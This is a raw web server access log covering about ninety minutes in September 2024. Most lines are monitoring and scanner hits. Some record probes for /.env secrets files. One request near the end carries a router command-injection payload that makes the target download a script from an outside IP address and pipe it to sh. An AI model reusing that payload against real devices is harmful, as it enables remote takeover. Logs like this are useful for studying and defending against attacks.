212.91.246.72 - - [01/Sep/2024:21:26:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:21:26:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
142.93.197.121 - - [01/Sep/2024:21:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4"
89.190.156.137 - - [01/Sep/2024:21:26:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:21:27:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:21:27:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:28:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:29:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:30:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:31:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:21:31:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:32:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:33:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:21:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:34:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:35:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:36:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.156.65.66 - - [01/Sep/2024:21:36:15 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:15 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:16 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:16 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:18 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:18 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:19 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:19 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:20 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.66 - - [01/Sep/2024:21:36:20 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
149.50.103.48 - - [01/Sep/2024:21:36:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:37:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:38:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:39:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:21:39:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.125 - - [01/Sep/2024:21:39:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.125 - - [01/Sep/2024:21:39:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [01/Sep/2024:21:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:40:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:41:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:42:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:43:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:43:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.245.169.175 - - [01/Sep/2024:21:43:44 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
185.191.126.213 - - [01/Sep/2024:21:43:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:45:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.43 - - [01/Sep/2024:21:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.43 - - [01/Sep/2024:21:45:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.43 - - [01/Sep/2024:21:45:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.43 - - [01/Sep/2024:21:45:59 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:46:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:47:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:48:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:21:48:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:49:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:50:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:21:50:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Sep/2024:21:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:51:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:52:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:53:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:21:53:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:54:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:56:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:21:57:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:21:57:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:21:57:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:21:58:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:21:59:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:00:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [01/Sep/2024:22:00:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:01:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:02:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:22:03:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:03:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:04:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:04:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:05:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:06:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:06:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:07:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:07:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:08:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:22:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Sep/2024:22:09:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:09:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:10:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:11:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:22:11:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:12:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:22:12:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:13:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:14:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:22:14:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [01/Sep/2024:22:14:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:15:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:22:15:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [01/Sep/2024:22:15:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:16:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:17:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:18:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.198 - - [01/Sep/2024:22:18:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.198 - - [01/Sep/2024:22:18:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.198 - - [01/Sep/2024:22:18:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.198 - - [01/Sep/2024:22:18:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:19:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:22:20:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Sep/2024:22:20:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:20:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Sep/2024:22:20:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:21:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:21:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:22:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:23:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:24:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:25:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.20.249 - - [01/Sep/2024:22:25:37 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [01/Sep/2024:22:25:38 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
18.130.199.174 - - [01/Sep/2024:22:25:58 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.130.199.174 - - [01/Sep/2024:22:26:14 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:27:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:22:27:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:28:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:29:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:30:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:31:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:32:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:22:32:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:33:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:34:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:34:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:35:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:36:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:37:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:38:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:38:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:39:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.20.249 - - [01/Sep/2024:22:39:51 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.249 - - [01/Sep/2024:22:39:51 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.191.126.213 - - [01/Sep/2024:22:40:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [01/Sep/2024:22:40:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Sep/2024:22:40:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:41:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Sep/2024:22:41:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:42:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:44:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.20.215 - - [01/Sep/2024:22:44:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.215 - - [01/Sep/2024:22:44:24 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
149.34.253.149 - - [01/Sep/2024:22:44:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:45:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:22:46:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [01/Sep/2024:22:49:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [01/Sep/2024:22:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [01/Sep/2024:22:52:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Sep/2024:22:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Sep/2024:22:53:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Sep/2024:22:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Sep/2024:22:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Sep/2024:22:55:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
